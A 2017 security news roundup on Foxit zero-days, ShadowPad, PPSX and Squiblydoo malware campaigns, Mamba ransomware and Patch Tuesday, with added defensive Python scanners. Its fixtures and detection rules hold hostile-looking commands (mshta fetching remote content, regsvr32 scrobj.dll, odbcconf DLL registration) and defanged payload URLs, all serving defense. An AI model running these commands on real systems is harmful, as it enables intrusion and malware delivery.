Two Zero-Day vulnerabilities discovered in Foxit PDF reader

Security researchers have discovered two critical zero-day security vulnerabilities in Foxit PDF Reader that could allow attackers to execute arbitrary code on a targeted computer, if the Safe Reading Mode is not enabled.

The first vulnerability (CVE-2017-10951) is a command injection bug discovered by researcher Ariele Caltabiano, while the second bug (CVE-2017-10952) is a file write issue found by Security researcher Steven Seeley.

An attacker can exploit these bugs by sending a specially crafted PDF file to a Foxit user and luring them into opening it.

Foxit declined to patch these vulnerabilities because they do not work when the “Safe Reading Mode” feature, which fortunately is enabled by default in Foxit Reader, is turned on. Researchers, however, believe that relying on a mitigation does not fully fix the vulnerabilities: if left unpatched, they could be exploited should attackers find a way to bypass Safe Reading Mode in the near future.

Both unpatched vulnerabilities can be triggered through the JavaScript API in Foxit Reader.

CVE-2017-10951: The command injection bug resides in the app.launchURL function, which executes attacker-supplied strings on the targeted system because of a lack of proper validation, as demonstrated in the video given below.

CVE-2017-10952: This vulnerability exists in the “saveAs” JavaScript function, which allows attackers to write an arbitrary file to any location on a targeted system, as demonstrated in the video given below.

“This vulnerability was exploited by embedding an HTA file in the document, then calling saveAS to write it to the startup folder, thus executing arbitrary VBScript code on startup,” reads the advisory published by the ZDI.

MITIGATION & PREVENTION

Ensure that you have the “Safe Reading Mode” feature enabled. Additionally, you can uncheck “Enable JavaScript Actions” in Foxit’s Preferences menu, although this may break some functionality.

Always be vigilant when opening files received via email; as the malicious PowerPoint case below shows, a single attachment can compromise your computer with malware.
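
As an added illustration (not code from the advisories or from Foxit), here is a small Python triage scanner that flags PDFs containing JavaScript, /Launch actions, or the two API calls named above. It goes a little beyond the advisories by also inflating FlateDecode streams and decoding /JS hex strings, where real documents usually hide their scripts; the sample PDF it builds is constructed for the test and the URL in it is a placeholder.

```python
import re
import zlib

# Calls named in the two advisories, plus the /Launch action that Safe Reading
# Mode exists to block. Extend the tuple with other calls your policy forbids.
RISKY_CALLS = (b"app.launchURL", b"saveAs")


def build_pdf_with_js(js: bytes, compress: bool = False) -> bytes:
    """Constructed test helper: a minimal PDF whose OpenAction runs `js`,
    optionally inside a FlateDecode stream as most real documents do."""
    if compress:
        body = zlib.compress(js)
        js_obj = (b"3 0 obj << /Length " + str(len(body)).encode()
                  + b" /Filter /FlateDecode >> stream\n" + body
                  + b"\nendstream endobj\n")
        js_ref = b"3 0 R"
    else:
        js_obj = b""
        js_ref = b"(" + js.replace(b"(", b"\\(").replace(b")", b"\\)") + b")"
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
            b"2 0 obj << /S /JavaScript /JS " + js_ref + b" >> endobj\n"
            + js_obj + b"trailer << /Root 1 0 R >>\n%%EOF\n")


def _blobs(pdf: bytes):
    """Yield the raw file, each Flate-inflatable stream and each /JS hex string."""
    yield pdf
    for m in re.finditer(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", pdf, re.S):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # image data or another filter; nothing to inspect here
    for m in re.finditer(rb"/JS\s*<([0-9A-Fa-f\s]+)>", pdf):
        h = re.sub(rb"\s", b"", m.group(1))
        yield bytes.fromhex((h + b"0" * (len(h) % 2)).decode("ascii"))


def scan_pdf(pdf: bytes) -> dict:
    """Report JavaScript presence, /Launch actions and the risky calls above."""
    found = {"javascript": False, "launch_action": False, "risky_calls": set()}
    for blob in _blobs(pdf):
        if re.search(rb"/(JavaScript|JS)\b", blob):
            found["javascript"] = True
        if re.search(rb"/S\s*/Launch\b", blob):
            found["launch_action"] = True
        found["risky_calls"].update(c.decode() for c in RISKY_CALLS if c in blob)
    found["risky_calls"] = sorted(found["risky_calls"])
    return found

# Constructed sample: a document whose only payload is a call to app.launchURL.
SAMPLE_PDF = build_pdf_with_js(b'app.launchURL("http://example.invalid", true);')
```

A hit on `risky_calls` is a triage signal, not proof of exploitation: legitimate forms also call saveAs, so quarantine and inspect rather than auto-block on this alone.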

ShadowPad backdoor spreads through software update

Kaspersky Lab discovered that attackers were able to modify the NetSarang software update to include malware tracked as the ShadowPad backdoor.

Founded in 1997, NetSarang Computer, Inc. develops, markets and supports secure connectivity solutions and specializes in the development of server management tools for large corporate networks.

In July, researchers at Kaspersky Lab were investigating suspicious DNS requests in a partner’s network. The requests were found on systems used to process transactions in a customer’s network in the financial industry.

Further investigation into the DNS queries led them to NetSarang, which promptly sanitized its software update process by removing the malicious library nssock2.dll from its update package.

“In July 2017, during an investigation, suspicious DNS requests were identified in a partner’s network. The partner, which is a financial institution, discovered the requests originating on systems involved in the processing of financial transactions.” states the analysis published by Kaspersky.

The analysis showed that recent versions of software produced and distributed by NetSarang had been surreptitiously modified to include an encrypted payload that could be remotely activated by a knowledgeable attacker.

The backdoor was embedded into one of the code libraries used by the software (nssock2.dll):

Figure: Disposition of the NSSOCK2.DLL binary with embedded malicious code

The attackers hid their malicious intent in several layers of encrypted code. The tiered architecture prevents the actual business logic of the backdoor from being activated until a special packet is received from the first-tier command and control (C&C) server (the “activation C&C server”). Until then, it only transfers basic information, including the computer, domain and user names, every 8 hours.

Activation of the payload would be triggered via a specially crafted DNS TXT record for a specific domain. The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com”.

Figure: Only when triggered by the first layer of C&C servers does the backdoor activate its second stage

The module performs a quick exchange with the controlling DNS server and provides basic target information (domain and user name, system date, network configuration) to the server. The C&C DNS server in return sends back the decryption key for the next stage of the code, effectively activating the backdoor.

The analysis indicates the embedded code acts as a modular backdoor platform. It can download and execute arbitrary code provided by the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim.

Kaspersky Lab revealed that the first known compile date for the ShadowPad backdoor is July 13; the attackers signed the malicious code with a legitimate NetSarang certificate.

Kaspersky confirmed an activated payload at a company in Hong Kong. Given that the NetSarang programs are used in hundreds of critical networks around the world, on servers and workstations belonging to system administrators, it is strongly recommended that companies take immediate action to identify and contain the compromised software.

Kaspersky published the list of Indicators of Compromise to help companies to check their systems.

 

New Malware Abuses PowerPoint Slide Show

In April, Microsoft fixed the CVE-2017-0199 vulnerability in Office after threat actors had been exploiting it in the wild. The same vulnerability has now been found being used, hidden behind a specially crafted PowerPoint (PPSX) presentation file.

CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents.

According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry.

Technical Analysis

The exploit arrives as a spear-phishing email attachment, purportedly from a cable manufacturing provider, that drops a remote access tool as its final payload.

Figure: the spear-phishing email

When the malicious PowerPoint Show is opened, it displays the text CVE-2017-8570, which is a different Microsoft Office vulnerability. However, based on Trend Micro’s analysis, it actually exploits CVE-2017-0199 instead. This is a leftover mistake from the toolkit developer, which the sender did not choose to change.

The file triggers a script moniker in ppt/slides/_rels/slide1[.]xml[.]rels. The exploit runs remote code fetched from hxxp://192[.]166[.]218[.]230:3550/logo[.]doc, a VPN or hosting service abused by the attacker.

Figure: the remote malicious code

When the sample is run, PowerPoint initializes the script moniker and runs the remote malicious payload via the PowerPoint Show animations feature.

Figure: RATMAN.EXE

The logo.doc file is actually an XML file with JavaScript code that runs a PowerShell command to download and execute the file known as RATMAN.EXE (detected by Trend Micro as BKDR_RESCOMS.CA). The executable is a trojanized version of the REMCOS remote access tool (RAT), fetched from the command and control (C&C) server hxxp://192[.]166[.]218[.]230:3550/ratman[.]exe, which is located in Poland. The 192[.]166[.]218[.]230 address is also known to host other kinds of RATs. RATMAN.EXE then connects to the C&C server at 5[.]134[.]116[.]146:3550 for execution.

RATMAN.EXE is a trojanized version of the Remcos remote control tool; once installed, it allows attackers to control infected computers remotely from their command-and-control server.

Figure: Remcos RAT control panel

Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world, with capabilities such as download-and-execute commands, a keylogger, a screen logger, and recorders for both webcam and microphone.

Since the exploit is usually used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focus on RTF. The use of PPSX files therefore also allows attackers to evade antivirus detection.
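
An added example (not Trend Micro’s code) of how a defender can triage PPSX files for the technique above: the script unpacks the Open XML package and inspects the slide relationship files for external script monikers or OLE object targets outside the package. The package it builds and the URL in it are constructed placeholders; the relationship type URIs are the standard Office Open XML ones.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# Monikers that make Office fetch and run content from a URL instead of a local part.
MONIKER = re.compile(r"^(script|mhtml):", re.I)

# Constructed test input: only the slide relationship part of a PPSX package,
# with a placeholder URL in place of the attacker-controlled host.
RELS_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:http://example.invalid/logo.doc" TargetMode="External"/>
</Relationships>"""


def build_sample_ppsx(rels_xml: bytes) -> bytes:
    """Constructed helper: wrap one rels part in a zip container like a PPSX."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


def find_suspicious_rels(ppsx: bytes) -> list:
    """Return (part, Id, Target, reason) for every relationship under ppt/ that
    uses a script/mhtml moniker or points an OLE object outside the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ppsx)) as z:
        for name in z.namelist():
            if not (name.startswith("ppt/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                reason = None
                if MONIKER.match(target):
                    reason = "script/mhtml moniker"
                elif external and rel.get("Type") == OLE_TYPE:
                    reason = "external OLE object"
                if reason:
                    hits.append((name, rel.get("Id"), target, reason))
    return hits
```

Ordinary hyperlinks are also external relationships, which is why the check keys on the moniker scheme and on the OLE object type rather than on TargetMode alone.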

The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability.

Malicious Email campaign targets Russian-Speaking companies

A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.

The campaign, discovered by Trend Micro, has been active for the last two months and targets Russian-speaking firms.

The attackers leverage multiple exploits and Windows components to run malicious scripts while avoiding detection. The last sample associated with this attack was uploaded to VirusTotal on June 6, 2017, and experts at Trend Micro observed five spam campaigns running from June 23 to July 27, 2017.

Figure: the backdoor email

The phishing messages are designed to appear as if they were sent from sales and billing departments and contain a weaponized Rich Text Format (RTF) file that exploits the CVE-2017-0199 flaw in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.

Their limited distribution and specificity in social engineering lures are red flags that may indicate they are a spear-phishing campaign.

Once the exploit code is executed, it downloads a fake Excel XLS file embedded with malicious JavaScript. When opened, the Excel header is ignored and the file is treated as an HTML Application file by the Windows component mshta.exe.

“The exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.” states the analysis published by Trend Micro.

“This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.”

The JavaScript code calls odbcconf.exe, a legitimate Windows executable, to run a DLL. Once executed, the DLL drops a SCT file (Windows scriptlet) in the %APPDATA% folder and appends the .TXT extension to it.

The DLL is used to launch a Squiblydoo attack, which abuses Regsvr32 (Microsoft Register Server) to bypass restrictions on running scripts and evade application whitelisting protections such as AppLocker.

“This particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally used to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is also known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts.” continues the analysis. “It also means evading application white-listing protections such as AppLocker. While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe.”

Next, the real backdoor is downloaded and executed; it is an XML file fetched from the domain wecloud[.]biz and, here too, it is run via the same Regsvr32-abusing Squiblydoo technique.

The analysis states that “This is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially allow attackers to take over an infected system. It tries to connect to its C&C server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:

  • d&exec = download and execute PE file
  • gtfo = delete files/startup entries and terminate
  • more_eggs = download additional/new scripts
  • more_onion = run new script and terminate current script
  • more_power = run command shell commands”

While the later stages of the infection chain required the use of various Windows components, the entry point still involves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users. Alternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL categorization, as well as enforcing robust patch management policies, will significantly reduce the system’s attack surface.
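
Added detection logic (not from Trend Micro’s analysis) for the chain described above, run over constructed process-creation records: it flags mshta.exe fetching remote non-HTA content, odbcconf.exe registering a DLL, and the regsvr32 /i: scrobj.dll Squiblydoo pattern, notes when the referenced file is a .txt under %APPDATA%, and checks whether the three show up as a parent/child lineage. The command-line shapes are the publicly documented ones for these living-off-the-land techniques, not strings quoted by the analysis; user names, paths and hosts are placeholders.

```python
import re

# Constructed process-creation records (like Sysmon Event ID 1), modelled on the
# chain above. User names, paths and hosts are placeholders.
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "mshta.exe",
     "cmd": "mshta.exe https://example.invalid/m11.xls"},
    {"parent": "mshta.exe", "image": "odbcconf.exe",
     "cmd": "odbcconf.exe /a {REGSVR C:\\Users\\u\\AppData\\Roaming\\x.dll}"},
    {"parent": "odbcconf.exe", "image": "regsvr32.exe",
     "cmd": "regsvr32.exe /s /n /u /i:C:\\Users\\u\\AppData\\Roaming\\cfg.txt scrobj.dll"},
    {"parent": "explorer.exe", "image": "regsvr32.exe",
     "cmd": "regsvr32.exe /s C:\\Program Files\\Vendor\\legit.dll"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmd": "notepad.exe readme.txt"},
]

# (rule title, child image, command-line pattern). The patterns are the publicly
# documented shapes of these techniques, not this campaign's exact strings.
RULES = [
    ("mshta.exe launching remote or non-HTA content", "mshta.exe",
     re.compile(r"https?://|\.(xls|txt|jpg)\b", re.I)),
    ("odbcconf.exe registering a DLL via /A {REGSVR ...}", "odbcconf.exe",
     re.compile(r"/a\s*\{\s*regsvr\b", re.I)),
    ("regsvr32.exe Squiblydoo (/i: target with scrobj.dll)", "regsvr32.exe",
     re.compile(r"/i:\S+.*\bscrobj\.dll", re.I)),
]
# The dropped scriptlet is saved under %APPDATA% with a .txt extension.
APPDATA_TXT = re.compile(r"AppData\\Roaming\\[^\s\"]+\.txt", re.I)


def evaluate(events: list) -> list:
    """Return (title, parent, cmd, appdata_txt_seen) for each matching record."""
    alerts = []
    for ev in events:
        for title, image, pattern in RULES:
            if ev["image"].lower() == image and pattern.search(ev["cmd"]):
                alerts.append((title, ev["parent"], ev["cmd"],
                               bool(APPDATA_TXT.search(ev["cmd"]))))
    return alerts


def chain_present(events: list) -> bool:
    """True when the mshta -> odbcconf -> regsvr32 lineage from the analysis is seen."""
    edges = {(ev["parent"].lower(), ev["image"].lower()) for ev in events}
    return {("mshta.exe", "odbcconf.exe"), ("odbcconf.exe", "regsvr32.exe")} <= edges
```

The per-process rules catch each stage on its own; the lineage check is what separates this campaign's chain from a lone administrator running regsvr32 legitimately.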

 

Mamba ransomware is back, hitting organizations in Brazil and Saudi Arabia

Mamba was among the first ransomware samples detected in public attacks that encrypted entire hard drives rather than individual files. It uses a disk-level encryption strategy instead of the conventional file-based one.

The first Mamba samples discovered in the wild used DiskCryptor, an open-source full-disk encryption tool, to strongly encrypt the data.

Researchers at Kaspersky Lab discovered a new wave of attacks leveraging the Mamba ransomware that hit organizations in Brazil and Saudi Arabia.

“Authors of wiper malware are not able to decrypt victims’ machines. For example, if you remember the ExPetr [malware], it uses a randomly generated key to encrypt a victim machine, but the trojan doesn’t save the key for further decryption,” said Kaspersky Lab researcher Orkhan Memedov. “So, we have a reason to call it ‘a wiper.’ However, in case of Mamba the key should be passed to the trojan as a command line argument, it means that the criminal knows this key and, in theory, the criminal is able to decrypt the machine.”

Once the malware has infected a Windows machine, it overwrites the existing Master Boot Record with a custom MBR and encrypts the hard drive using the DiskCryptor tool.

“Unfortunately there is no way to decrypt data that has been encrypted with the DiskCryptor utility, because this legitimate utility uses strong encryption algorithms,” explained Kaspersky Lab.

The latest Mamba samples show an unusual ransom note that, instead of demanding money as the original Mamba did, provides two email addresses and an ID number to be used to recover the encryption key.

The threat actor behind the new wave of Mamba attacks uses the PSEXEC utility to execute the malware across the corporate network once it has gained a foothold. PSEXEC is the same tool NotPetya used to spread within target networks.

The attack chain described by Kaspersky has two phases:

Stage 1 (Preparation):

  • Create folder “C:\xampp\http”
  • Drop DiskCryptor components into the folder
  • Install DiskCryptor driver
  • Register system service called DefragmentService
  • Reboot victim machine

Stage 2 (Encryption):

  • Setup bootloader to MBR and encrypt disk partitions using DiskCryptor software
  • Clean up
  • Reboot victim machine


“It is important to mention that for each machine in a victim’s network, the threat actor generates a password for the DiskCryptor utility,” Kaspersky Lab said in its report. “This password is passed via command line arguments to the ransomware dropper.”

Microsoft patches 25 critical vulnerabilities

Microsoft, as part of its August Patch Tuesday, has released a large batch of 48 security updates, consisting of 25 critical, 21 important and 2 moderate in severity, for all supported versions of Windows and other products.

These vulnerabilities impact various versions of Microsoft’s Windows operating systems, Internet Explorer, Microsoft Edge, Microsoft SharePoint, the Windows Subsystem for Linux, Adobe Flash Player, Windows Hyper-V and Microsoft SQL Server.

Some of these are:

CVE-2017-8620: Windows Search Remote Code Execution Vulnerability

This vulnerability affects all versions of Windows 7 and Windows 10 and could be used in a wormable attack like the one used by the WannaCry ransomware, as it utilises SMBv1 connections.

An attacker could remotely exploit the vulnerability through an SMB connection to elevate privileges and take control of the targeted Windows computer.

“A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,” Microsoft explains.

CVE-2017-8633: Windows Error Reporting Elevation of Privilege Vulnerability

Another elevation of privilege vulnerability resides in Windows Error Reporting (WER) and could allow an attacker who runs a specially crafted application to gain administrator privileges on the targeted system and steal sensitive information.

“This update corrects the way the WER handles and executes files,” the advisory says.

CVE-2017-8627: Windows Subsystem for Linux DoS Vulnerability

Another important vulnerability was discovered in the Windows Subsystem for Linux that could allow an attacker to execute code with elevated permissions.

“To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application. The security update addresses the vulnerability by correcting how Windows Subsystem for Linux handles NT pipes” the advisory says.

Successful exploitation could ultimately result in a denial-of-service condition, leaving the targeted system unresponsive.

Microsoft has released patches for all the vulnerabilities, and users are advised to install them immediately.